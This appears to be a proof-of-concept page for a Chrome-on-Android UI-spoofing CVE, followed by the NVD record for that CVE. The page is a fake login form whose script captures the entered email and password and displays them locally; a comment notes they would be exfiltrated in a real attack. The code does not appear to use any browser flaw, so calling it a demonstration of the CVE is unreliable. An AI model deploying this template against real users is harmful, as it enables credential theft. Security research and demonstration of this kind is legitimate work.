CVE-2026-0901

<!-- CVE-2026-0901 PoC: UI Spoofing in Google Chrome on Android --> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>UI Spoofing PoC - CVE-2026-0901</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; justify-content: center; align-items: center; padding: 20px; } .spoofed-interface { background: white; border-radius: 20px; padding: 40px; max-width: 400px; width: 100%; box-shadow: 0 20px 60px rgba(0,0,0,0.3); } .header { background: #4285f4; color: white; padding: 15px 20px; margin: -40px -40px 20px -40px; border-radius: 20px 20px 0 0; font-weight: bold; font-size: 18px; } .input-group { margin-bottom: 20px; } .input-group label { display: block; margin-bottom: 8px; color: #333; font-weight: 500; } .input-group input { width: 100%; padding: 12px; border: 2px solid #e0e0e0; border-radius: 10px; font-size: 16px; transition: border-color 0.3s; } .input-group input:focus { outline: none; border-color: #4285f4; } .submit-btn { width: 100%; padding: 15px; background: #4285f4; color: white; border: none; border-radius: 10px; font-size: 18px; font-weight: bold; cursor: pointer; transition: background 0.3s; } .submit-btn:hover { background: #3367d6; } .warning { background: #fff3cd; border: 1px solid #ffc107; color: #856404; padding: 15px; border-radius: 10px; margin-top: 20px; font-size: 14px; } .hidden-malicious { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); justify-content: center; align-items: center; z-index: 9999; } .malicious-content { background: white; padding: 30px; border-radius: 15px; text-align: center; } </style> </head> <body> <div class="spoofed-interface"> <div class="header">🔐 Secure Login Portal</div> <h2 style="margin-bottom: 20px; color: #333;">Welcome Back</h2> <form id="loginForm"> <div class="input-group"> <label for="email">Email Address</label> <input type="email" id="email" name="email" placeholder="Enter your email" required> </div> <div class="input-group"> <label for="password">Password</label> <input type="password" id="password" name="password" placeholder="Enter your password" required> </div> <button type="submit" class="submit-btn">Sign In</button> </form> <div class="warning"> ⚠️ This is a demonstration of UI Spoofing vulnerability (CVE-2026-0901). In a real attack, this interface could be used to steal credentials. </div> </div> <div class="hidden-malicious" id="maliciousOverlay"> <div class="malicious-content"> <h3>⚠️ Credentials Captured!</h3> <p id="capturedData"></p> </div> </div> <script> document.getElementById('loginForm').addEventListener('submit', function(e) { e.preventDefault(); const email = document.getElementById('email').value; const password = document.getElementById('password').value; // Display captured credentials (in real attack, these would be exfiltrated) document.getElementById('capturedData').innerHTML = 'Email: ' + email + '<br>Password: ' + password; document.getElementById('maliciousOverlay').style.display = 'flex'; console.log('CVE-2026-0901 PoC - UI Spoofing demonstration'); console.log('Captured credentials:', { email: email, password: password }); }); </script> </body> </html>

{"cve": {"id": "CVE-2026-0901", "sourceIdentifier": "[email protected]", "published": "2026-01-20T05:16:15.510", "lastModified": "2026-01-30T16:28:25.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Blink in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High)"}, {"lang": "es", "value": "Implementación inapropiada en Blink en Google Chrome en Android anterior a 144.0.7559.59 permitió a un atacante remoto realizar suplantación de UI mediante una página HTML manipulada. (Gravedad de seguridad de Chromium: Alta)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "144.0.7559.59", "matchCriteriaId": "7322229C-61DF-4A91-9816-F7796F9AABCD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/40057499", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}